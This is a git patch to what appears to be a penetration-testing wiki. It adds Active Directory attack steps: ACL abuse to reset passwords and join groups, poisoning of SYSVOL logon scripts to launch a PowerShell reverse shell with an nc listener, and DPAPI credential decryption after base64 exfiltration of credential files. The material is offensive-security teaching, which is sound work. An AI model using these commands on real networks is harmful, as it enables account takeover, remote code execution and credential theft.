From 10e8633a30a4b9f82fd9dd86cc71e5c8a95a78ad Mon Sep 17 00:00:00 2001 From: carlospolop Date: Tue, 30 Sep 2025 00:25:48 +0200 Subject: [PATCH] f --- .../pentesting-smb/README.md | 5 +- .../acl-persistence-abuse/README.md | 122 ++++++++++++++++++ .../dpapi-extracting-passwords.md | 43 ++++++ 3 files changed, 168 insertions(+), 2 deletions(-) diff --git a/src/network-services-pentesting/pentesting-smb/README.md b/src/network-services-pentesting/pentesting-smb/README.md index be83352bf..d10ea746a 100644 --- a/src/network-services-pentesting/pentesting-smb/README.md +++ b/src/network-services-pentesting/pentesting-smb/README.md @@ -361,8 +361,9 @@ sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'De Specially interesting from shares are the files called **`Registry.xml`** as they **may contain passwords** for users configured with **autologon** via Group Policy. Or **`web.config`** files as they contains credentials. > [!TIP] -> The **SYSVOL share** is **readable** by all authenticated users in the domain. In there you may **find** many different batch, VBScript, and PowerShell **scripts**.\ -> You should **check** the **scripts** inside of it as you might **find** sensitive info such as **passwords**. +> The **SYSVOL share** is **readable** by all authenticated users in the domain. In there you may **find** many different batch, VBScript, and PowerShell **scripts**. +> You should **check** the **scripts** inside of it as you might **find** sensitive info such as **passwords**. Also, don’t trust automated share listings: even if a share looks read-only, the underlying NTFS ACLs may allow writes. Always test with smbclient by uploading a small file to `\\\\SYSVOL\\\\scripts\\`. +> If writable, you can [poison logon scripts for RCE at user logon](../../windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md#sysvolnetlogon-logon-script-poisoning). ## Read Registry diff --git a/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md b/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md index fe4077534..0c73c9bdf 100644 --- a/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md +++ b/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md @@ -16,6 +16,19 @@ BadSuccessor.md This privilege grants an attacker full control over a target user account. Once `GenericAll` rights are confirmed using the `Get-ObjectAcl` command, an attacker can: - **Change the Target's Password**: Using `net user /domain`, the attacker can reset the user's password. +- From Linux, you can do the same over SAMR with Samba `net rpc`: + +```bash +# Reset target user's password over SAMR from Linux +net rpc password '' -U /%'' -S +``` + +- **If the account is disabled, clear the UAC flag**: `GenericAll` allows editing `userAccountControl`. From Linux, BloodyAD can remove the `ACCOUNTDISABLE` flag: + +```bash +bloodyAD --host -d -u -p '' remove uac -f ACCOUNTDISABLE +``` + - **Targeted Kerberoasting**: Assign an SPN to the user's account to make it kerberoastable, then use Rubeus and targetedKerberoast.py to extract and attempt to crack the ticket-granting ticket (TGT) hashes. ```bash @@ -30,6 +43,12 @@ Set-DomainObject -Credential $creds -Identity -Clear serviceprincipal Set-DomainObject -Identity -XOR @{UserAccountControl=4194304} ``` +- **Shadow Credentials / Key Credential Link**: With `GenericAll` on a user you can add a certificate-based credential and authenticate as them without changing their password. See: + +{{#ref}} +shadow-credentials.md +{{#endref}} + ## **GenericAll Rights on Group** This privilege allows an attacker to manipulate group memberships if they have `GenericAll` rights on a group like `Domain Admins`. After identifying the group's distinguished name with `Get-NetGroup`, the attacker can: @@ -131,6 +150,15 @@ Get-DomainGroupMember -Identity "Group Name" | Select MemberName Remove-DomainGroupMember -Credential $creds -Identity "Group Name" -Members 'username' -Verbose ``` +- From Linux, Samba `net` can add/remove members when you hold `GenericWrite` on the group (useful when PowerShell/RSAT are unavailable): + +```bash +# Add yourself to the target group via SAMR +net rpc group addmem "" -U /%'' -S +# Verify current members +net rpc group members "" -U /%'' -S +``` + ## **WriteDACL + WriteOwner** Owning an AD object and having `WriteDACL` privileges on it enables an attacker to grant themselves `GenericAll` privileges over the object. This is accomplished through ADSI manipulation, allowing for full control over the object and the ability to modify its group memberships. Despite this, limitations exist when trying to exploit these privileges using the Active Directory module's `Set-Acl` / `Get-Acl` cmdlets. @@ -143,6 +171,31 @@ $ADSI.psbase.ObjectSecurity.SetAccessRule($ACE) $ADSI.psbase.commitchanges() ``` +### WriteDACL/WriteOwner quick takeover (PowerView) + +When you have `WriteOwner` and `WriteDacl` over a user or service account, you can take full control and reset its password using PowerView without knowing the old password: + +```powershell +# Load PowerView +. .\PowerView.ps1 + +# Grant yourself full control over the target object (adds GenericAll in the DACL) +Add-DomainObjectAcl -Rights All -TargetIdentity -PrincipalIdentity -Verbose + +# Set a new password for the target principal +$cred = ConvertTo-SecureString 'P@ssw0rd!2025#' -AsPlainText -Force +Set-DomainUserPassword -Identity -AccountPassword $cred -Verbose +``` + +Notes: +- You may need to first change the owner to yourself if you only have `WriteOwner`: + +```powershell +Set-DomainObjectOwner -Identity -OwnerIdentity +``` + +- Validate access with any protocol (SMB/LDAP/RDP/WinRM) after password reset. + ## **Replication on the Domain (DCSync)** The DCSync attack leverages specific replication permissions on the domain to mimic a Domain Controller and synchronize data, including user credentials. This powerful technique requires permissions like `DS-Replication-Get-Changes`, allowing attackers to extract sensitive information from the AD environment without direct access to a Domain Controller. [**Learn more about the DCSync attack here.**](../dcsync.md) @@ -208,6 +261,71 @@ The XML configuration file for Users and Groups outlines how these changes are i Furthermore, additional methods for executing code or maintaining persistence, such as leveraging logon/logoff scripts, modifying registry keys for autoruns, installing software via .msi files, or editing service configurations, can also be considered. These techniques provide various avenues for maintaining access and controlling target systems through the abuse of GPOs. +## SYSVOL/NETLOGON Logon Script Poisoning + +Writable paths under `\\\SYSVOL\\scripts\` or `\\\NETLOGON\` allow tampering with logon scripts executed at user logon via GPO. This yields code execution in the security context of logging users. + +### Locate logon scripts +- Inspect user attributes for a configured logon script: + +```powershell +Get-DomainUser -Identity -Properties scriptPath, scriptpath +``` + +- Crawl domain shares to surface shortcuts or references to scripts: + +```bash +# NetExec spider (authenticated) +netexec smb -u -p -M spider_plus +``` + +- Parse `.lnk` files to resolve targets pointing into SYSVOL/NETLOGON (useful DFIR trick and for attackers without direct GPO access): + +```bash +# LnkParse3 +lnkparse login.vbs.lnk +# Example target revealed: +# C:\Windows\SYSVOL\sysvol\\scripts\login.vbs +``` + +- BloodHound displays the `logonScript` (scriptPath) attribute on user nodes when present. + +### Validate write access (don’t trust share listings) +Automated tooling may show SYSVOL/NETLOGON as read-only, but underlying NTFS ACLs can still allow writes. Always test: + +```bash +# Interactive write test +smbclient \\\SYSVOL -U % +smb: \\> cd \scripts\ +smb: \\\scripts\\> put smallfile.txt login.vbs # check size/time change +``` + +If file size or mtime changes, you have write. Preserve originals before modifying. + +### Poison a VBScript logon script for RCE +Append a command that launches a PowerShell reverse shell (generate from revshells.com) and keep original logic to avoid breaking business function: + +```vb +' At top of login.vbs +Set cmdshell = CreateObject("Wscript.Shell") +cmdshell.run "powershell -e " + +' Existing mappings remain +MapNetworkShare "\\\\\\apps", "V" +MapNetworkShare "\\\\\\docs", "L" +``` + +Listen on your host and wait for the next interactive logon: + +```bash +rlwrap -cAr nc -lnvp 443 +``` + +Notes: +- Execution happens under the logging user’s token (not SYSTEM). Scope is the GPO link (OU, site, domain) applying that script. +- Clean up by restoring the original content/timestamps after use. + + ## References - [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces) @@ -217,6 +335,10 @@ Furthermore, additional methods for executing code or maintaining persistence, s - [https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/) - [https://adsecurity.org/?p=3658](https://adsecurity.org/?p=3658) - [https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryaccessrule.-ctor?view=netframework-4.7.2#System_DirectoryServices_ActiveDirectoryAccessRule\_\_ctor_System_Security_Principal_IdentityReference_System_DirectoryServices_ActiveDirectoryRights_System_Security_AccessControl_AccessControlType\_](https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryaccessrule.-ctor?view=netframework-4.7.2#System_DirectoryServices_ActiveDirectoryAccessRule__ctor_System_Security_Principal_IdentityReference_System_DirectoryServices_ActiveDirectoryRights_System_Security_AccessControl_AccessControlType_) +- [https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryaccessrule.-ctor?view=netframework-4.7.2#System_DirectoryServices_ActiveDirectoryAccessRule__ctor_System_Security_Principal_IdentityReference_System_DirectoryServices_ActiveDirectoryRights_System_Security_AccessControl_AccessControlType_](https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryaccessrule.-ctor?view=netframework-4.7.2#System_DirectoryServices_ActiveDirectoryAccessRule__ctor_System_Security_Principal_IdentityReference_System_DirectoryServices_ActiveDirectoryRights_System_Security_AccessControl_AccessControlType_) +- [BloodyAD – AD attribute/UAC operations from Linux](https://github.com/CravateRouge/bloodyAD) +- [Samba – net rpc (group membership)](https://www.samba.org/) +- [HTB Puppy: AD ACL abuse, KeePassXC Argon2 cracking, and DPAPI decryption to DC admin](https://0xdf.gitlab.io/2025/09/27/htb-puppy.html) {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md b/src/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md index 4f0d15aac..629428048 100644 --- a/src/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md +++ b/src/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md @@ -263,6 +263,47 @@ SharpDPAPI.exe blob /target:C:\path\to\encrypted\file /unprotect ``` --- + +### Offline decryption with Impacket dpapi.py + +If you have the victim user’s SID and password (or NT hash), you can decrypt DPAPI masterkeys and Credential Manager blobs entirely offline using Impacket’s dpapi.py. + +- Identify artefacts on disk: + - Credential Manager blob(s): %APPDATA%\Microsoft\Credentials\ + - Matching masterkey: %APPDATA%\Microsoft\Protect\\{GUID} + +- If file transfer tooling is flaky, base64 the files on-host and copy the output: + +```powershell +# Base64-encode files for copy/paste exfil +[Convert]::ToBase64String([IO.File]::ReadAllBytes("$env:APPDATA\Microsoft\Credentials\C8D69E...B9")) +[Convert]::ToBase64String([IO.File]::ReadAllBytes("$env:APPDATA\Microsoft\Protect\\556a2412-1275-4ccf-b721-e6a0b4f90407")) +``` + +- Decrypt the masterkey with the user’s SID and password/hash: + +```bash +# Plaintext password +python3 dpapi.py masterkey -file 556a2412-1275-4ccf-b721-e6a0b4f90407 \ + -sid S-1-5-21-1111-2222-3333-1107 -password 'UserPassword!' + +# Or with NT hash +python3 dpapi.py masterkey -file 556a2412-1275-4ccf-b721-e6a0b4f90407 \ + -sid S-1-5-21-1111-2222-3333-1107 -key 0x +``` + +- Use the decrypted masterkey to decrypt the credential blob: + +```bash +python3 dpapi.py credential -file C8D69EBE9A43E9DEBF6B5FBD48B521B9 -key 0x +# Expect output like: Type=CRED_TYPE_DOMAIN_PASSWORD; Target=Domain:target=DOMAIN +# Username= ; Password= +``` + +This workflow often recovers domain credentials saved by apps using the Windows Credential Manager, including administrative accounts (e.g., `*_adm`). + +--- + ### Handling Optional Entropy ("Third-party entropy") Some applications pass an additional **entropy** value to `CryptProtectData`. Without this value the blob cannot be decrypted, even if the correct masterkey is known. Obtaining the entropy is therefore essential when targeting credentials protected in this way (e.g. Microsoft Outlook, some VPN clients). @@ -391,5 +432,7 @@ Decryption yields the complete JSON configuration, including every **device post - [https://github.com/Hashcat/Hashcat/releases/tag/v6.2.6](https://github.com/Hashcat/Hashcat/releases/tag/v6.2.6) - [https://github.com/Leftp/DPAPISnoop](https://github.com/Leftp/DPAPISnoop) - [https://pypi.org/project/donpapi/2.0.0/](https://pypi.org/project/donpapi/2.0.0/) +- [Impacket – dpapi.py](https://github.com/fortra/impacket) +- [HTB Puppy: AD ACL abuse, KeePassXC Argon2 cracking, and DPAPI decryption to DC admin](https://0xdf.gitlab.io/2025/09/27/htb-puppy.html) {{#include ../../banners/hacktricks-training.md}}